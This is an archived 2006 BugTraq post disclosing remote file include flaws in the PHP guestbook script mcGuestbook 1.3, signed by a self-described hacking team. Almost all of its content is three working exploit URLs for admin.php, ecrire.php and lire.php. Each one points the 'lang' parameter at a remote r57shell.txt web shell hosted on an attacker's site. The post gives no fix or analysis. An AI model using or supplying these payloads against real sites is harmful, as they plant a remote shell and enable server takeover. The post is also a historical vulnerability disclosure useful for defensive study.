BugTraq
file include exploits in mcGuestbook 1.3 Jun 16 2006 05:09PM
SWEET SWEET (gamr-14 hotmail com)
Multiple file include exploits in mcGuestbook 1.3

script type : mcGuestbook 1.3
bug found by : sweet-devil
team : site-down
type : file include

####################################################
exploits :

admin.php

http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?

ecrire.php

http://www.example.com/path/ecrire.php?lang=http://yoursite/r57shell.txt
?

lire.php

http://www.example.com/path/lire.php?lang=http://yoursite/r57shell.txt?

####################################################

#######################
emails:

gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################

All my respect to our friends , lezr.com

done .. peace

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now!
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus